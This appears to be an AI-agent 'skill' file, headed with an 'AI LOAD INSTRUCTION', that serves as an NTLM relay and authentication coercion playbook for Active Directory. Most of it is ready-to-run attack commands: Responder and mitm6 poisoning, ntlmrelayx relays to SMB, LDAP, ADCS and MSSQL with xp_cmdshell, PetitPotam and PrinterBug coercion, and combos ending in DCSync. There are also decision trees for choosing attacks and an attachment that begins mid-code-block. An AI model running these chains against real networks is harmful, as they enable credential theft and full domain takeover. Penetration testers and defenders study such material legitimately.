# SKILL: NTLM Relay and Authentication Coercion — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert NTLM relay and coercion techniques. Covers relay to SMB/LDAP/HTTP/MSSQL, signing requirements, Responder poisoning, mitm6, cross-protocol relay, WebDAV coercion, and all major coercion methods. Base models miss signing/EPA requirements and cross-protocol relay constraints.

## 0. RELATED ROUTING

Before going deep, consider loading:

- [active-directory-certificate-services](../active-directory-certificate-services/SKILL.md) for ESC8 (relay to ADCS enrollment)
- [active-directory-acl-abuse](../active-directory-acl-abuse/SKILL.md) for ACL modification via LDAP relay (RBCD, shadow creds)
- [active-directory-kerberos-attacks](../active-directory-kerberos-attacks/SKILL.md) for Kerberos attacks after relay success
- [windows-lateral-movement](../windows-lateral-movement/SKILL.md) for post-relay lateral movement

### Advanced Reference

Also load [COERCION_METHODS.md](./COERCION_METHODS.md) when you need:

- Detailed coercion method comparison (PetitPotam, PrinterBug, DFSCoerce, etc.)
- RPC function-level details and prerequisites
- Coercer tool usage and discovery

---

## 1. NTLM RELAY FUNDAMENTALS

```
Victim                Attacker (relay)              Target
  │                         │                          │
  │── NTLM Auth ───────────→│                          │  (1) Victim authenticates (coerced/poisoned)
  │                         │── Forward Auth ─────────→│  (2) Attacker relays to target
  │                         │←─ Challenge ─────────────│  (3) Target sends challenge
  │←─ Challenge ────────────│                          │  (4) Attacker forwards challenge to victim
  │── Response ────────────→│                          │  (5) Victim computes response
  │                         │── Forward Response ─────→│  (6) Attacker relays response to target
  │                         │←─ Authenticated! ────────│  (7) Target accepts → attacker has session
```

### NTLMv1 vs NTLMv2

| Feature | NTLMv1 | NTLMv2 |
|---|---|---|
| Security | Weak (crackable to NTLM hash) | Stronger (but still relayable) |
| Relay | Yes | Yes |
| Crack to hash | Yes (rainbow tables, crack.sh) | Offline brute-force only |
| Downgrade | Force via Responder `--lm` | Default in modern Windows |

---

## 2. RELAY TARGET MATRIX

| Target Protocol | What You Get | Signing Required by Default? | EPA/Channel Binding? |
|---|---|---|---|
| **SMB** | Command exec (if admin), file access | **DCs: Yes**, Workstations: No | No |
| **LDAP** | ACL modification, RBCD, shadow creds, add computer | **DCs: No** (negotiated) | No (unless configured) |
| **LDAPS** | Same as LDAP but encrypted | N/A | **Yes** (channel binding) |
| **HTTP (ADCS)** | Certificate enrollment (ESC8) | No | Depends on config |
| **MSSQL** | SQL queries, xp_cmdshell | No | No |
| **IMAP/SMTP** | Email access | No | No |
| **RPC** | Various (CA enrollment for ESC11) | Depends | No |

### Signing Check

```bash
# Check SMB signing on target
crackmapexec smb TARGET_IP --gen-relay-list relay_targets.txt
# Outputs hosts WITHOUT required SMB signing

# Nmap SMB signing check
nmap -p 445 --script smb2-security-mode TARGET_RANGE
```

---

## 3. RESPONDER — CREDENTIAL CAPTURE

### LLMNR/NBT-NS/WPAD/mDNS Poisoning

```bash
# Start Responder (capture mode — don't relay, just capture hashes)
responder -I eth0 -dwP

# Analyze mode (passive, no poisoning)
responder -I eth0 -A

# Key protocols poisoned:
# LLMNR (UDP 5355) — Link-Local Multicast Name Resolution
# NBT-NS (UDP 137) — NetBIOS Name Service
# WPAD — Web Proxy Auto-Discovery (proxy config)
# mDNS (UDP 5353) — Multicast DNS
```

### Responder + Relay (Don't Capture, Relay Instead)

```bash
# Disable HTTP and SMB servers in Responder (ntlmrelayx will handle them)
# Edit /etc/responder/Responder.conf: set HTTP and SMB to Off

# Start Responder for poisoning only
responder -I eth0 -dwP

# Start ntlmrelayx for relay
ntlmrelayx.py -tf targets.txt -smb2support
```

---

## 4. NTLMRELAYX — RELAY EXECUTION

### Relay to SMB (Admin Execution)

```bash
# Execute command on targets (requires admin privs on target)
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Dump SAM hashes
ntlmrelayx.py -tf targets.txt -smb2support

# Interactive SOCKS proxy (maintain sessions)
ntlmrelayx.py -tf targets.txt -smb2support -socks
# Then: proxychains smbclient //TARGET/C$ -U DOMAIN/user
```

### Relay to LDAP (ACL Modification)

```bash
# Automatic RBCD (delegate-access)
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support

# Escalate via shadow credentials
ntlmrelayx.py -t ldap://DC_IP --shadow-credentials -smb2support

# Add computer account
ntlmrelayx.py -t ldap://DC_IP --add-computer FAKE01 P@ss123 -smb2support

# Dump domain info
ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain
```

### Relay to ADCS HTTP (ESC8)

```bash
ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \
    --adcs --template DomainController

# Use with coercion to relay DC auth → get DC certificate
```

### Relay to MSSQL

```bash
ntlmrelayx.py -t mssql://SQL_HOST -smb2support -q "SELECT system_user; EXEC xp_cmdshell 'whoami'"
```

---

## 5. MITM6 — IPv6 DNS TAKEOVER

```bash
# mitm6 exploits IPv6 auto-configuration to become DNS server
mitm6 -d domain.com

# Combined with ntlmrelayx
ntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --delegate-access -smb2support

# Flow:
# 1. mitm6 sends DHCPv6 replies → victim gets attacker as IPv6 DNS
# 2. Victim queries WPAD → attacker responds
# 3. NTLM auth triggered → relayed to LDAP
# 4. RBCD or shadow credentials set on victim computer
```

---

## 6. CROSS-PROTOCOL RELAY

### SMB → LDAP

Capture SMB authentication, relay to LDAP (requires no LDAP signing enforcement).

```bash
# Coerce SMB auth from DC, relay to LDAP on same or different DC
ntlmrelayx.py -t ldap://DC02_IP --delegate-access -smb2support

# Trigger coercion (attacker receives SMB auth)
PetitPotam.py ATTACKER_IP DC01_IP
```

**Limitation**: SMB → LDAP relay fails if the source uses SMB signing negotiation that indicates relay.

### WebDAV → LDAP

WebDAV from workstations sends NTLM over HTTP → relay to LDAP (no signing issues).

```bash
# WebDAV coercion sends HTTP-based NTLM (no SMB signing concern)
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support

# Coerce via WebDAV (workstation must have WebClient service running)
# Use @ATTACKER_PORT format to force WebDAV
PetitPotam.py ATTACKER@80/test WORKSTATION_IP
```

---

## 7. WEBDAV-BASED COERCION

WebClient service (WebDAV) converts SMB-type coercion to HTTP-based NTLM.

```bash
# Check if WebClient is running (port 80 listener or service query)
crackmapexec smb TARGET -u user -p pass -M webdav

# Start WebDAV coercion (from workstation, not server)
# Force target to authenticate via HTTP:
# Use UNC path format: \\ATTACKER@PORT\share
```

**Key advantage**: HTTP-based NTLM avoids SMB signing requirements.

---

## 8. NTLM RELAY DECISION TREE

```
Want to relay NTLM authentication
│
├── What auth can you capture?
│   ├── Responder poisoning (passive, wait for queries)
│   ├── mitm6 (DHCPv6 DNS takeover, periodic)
│   └── Active coercion → load COERCION_METHODS.md
│
├── What target to relay to?
│   │
│   ├── Need code execution?
│   │   ├── SMB target without signing → ntlmrelayx to SMB (§4)
│   │   └── MSSQL target → ntlmrelayx to MSSQL + xp_cmdshell (§4)
│   │
│   ├── Need domain escalation?
│   │   ├── LDAP signing not enforced?
│   │   │   ├── Relay to LDAP → RBCD (§4)
│   │   │   ├── Relay to LDAP → shadow credentials (§4)
│   │   │   └── Relay to LDAP → add computer + delegate (§4)
│   │   └── LDAP signing enforced?
│   │       └── Relay to ADCS HTTP (ESC8) → certificate (§4)
│   │
│   └── Need certificate?
│       └── Relay to ADCS HTTP/RPC → ESC8/ESC11 (§4)
│
├── Source is SMB-based?
│   ├── Target is SMB → check signing (§2)
│   ├── Target is LDAP → may work (cross-protocol, §6)
│   └── Target is HTTP → works (cross-protocol)
│
├── Source is HTTP-based (WebDAV)?
│   └── Relay to any target (no signing issues, §6/§7)
│
└── Relay fails?
    ├── Check signing requirements (§2)
    ├── Check EPA/channel binding
    ├── Try cross-protocol (SMB → LDAP)
    └── Try WebDAV coercion (avoids SMB signing)
```

---

Source: https://github.com/yaklang/hack-skills/blob/HEAD/skills/ntlm-relay-coercion/SKILL.md (skill `ntlm-relay-coercion`, author @skillopedia, imported 2026-06-05, version v1). Description: NTLM relay and authentication coercion playbook. Use when capturing and relaying NTLM authentication to escalate privileges via SMB, LDAP, HTTP, or MSSQL relay targets, combined with PetitPotam, PrinterBug, and other coercion methods.

---

# Attachment: COERCION_METHODS.md

Only the tail of this attachment survives on the page; it begins inside the code block of an earlier combo, which is cut off.

```bash
:'pass'
```

### Combo 2: PrinterBug + Unconstrained Delegation

```bash
# On compromised host with unconstrained delegation:
Rubeus.exe monitor /interval:5 /nowrap /targetuser:DC01$

# Trigger from anywhere:
printerbug.py DOMAIN/user:pass@DC01 UNCONSTRAINED_HOST

# Capture DC01$ TGT → DCSync
```

### Combo 3: PetitPotam + ADCS Relay (ESC8)

```bash
# Terminal 1: Relay to ADCS
ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \
    --adcs --template DomainController

# Terminal 2: Coerce DC
PetitPotam.py ATTACKER_IP DC01_IP

# Result: Certificate for DC01$ → authenticate → DCSync
certipy auth -pfx dc01.pfx -dc-ip DC02_IP
```

### Combo 4: mitm6 + LDAP Relay → Shadow Credentials

```bash
# Terminal 1: mitm6 DNS takeover
mitm6 -d domain.com

# Terminal 2: Relay to LDAP with shadow credentials
ntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --shadow-credentials -smb2support

# Result: Shadow credential added on victim machine → PKINIT auth
```

### Combo 5: WebDAV Coercion + LDAP Relay (Bypass SMB Signing)

```bash
# Terminal 1: Start relay
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support

# Terminal 2: Coerce via WebDAV (HTTP-based, no SMB signing issue)
PetitPotam.py ATTACKER@80/test WORKSTATION_IP
# Workstation's WebClient service sends HTTP-based NTLM → clean relay
```

---

## 8. COERCION METHOD SELECTION TREE

```
Need to coerce authentication
│
├── Target is a Domain Controller?
│   ├── PetitPotam (unauthenticated if unpatched)
│   ├── PetitPotam (authenticated — most reliable)
│   ├── DFSCoerce (if DFS role installed)
│   └── PrinterBug (if Spooler running — rare on modern DCs)
│
├── Target is a file server?
│   ├── ShadowCoerce (if FSRVP agent running)
│   ├── PetitPotam (authenticated)
│   └── PrinterBug (if Spooler running)
│
├── Target is a workstation?
│   ├── PrinterBug (Spooler usually running)
│   ├── PetitPotam (authenticated)
│   └── WebDAV coercion (if WebClient running — HTTP-based!)
│
├── No creds available?
│   ├── PetitPotam unauthenticated (unpatched systems only)
│   ├── Responder poisoning (passive capture)
│   └── mitm6 (DHCPv6 DNS takeover)
│
├── Need HTTP-based NTLM (bypass SMB signing)?
│   ├── WebDAV coercion from workstation
│   └── mitm6 WPAD trigger
│
└── Not sure what works?
    └── Use Coercer tool: coercer scan -t TARGET
```
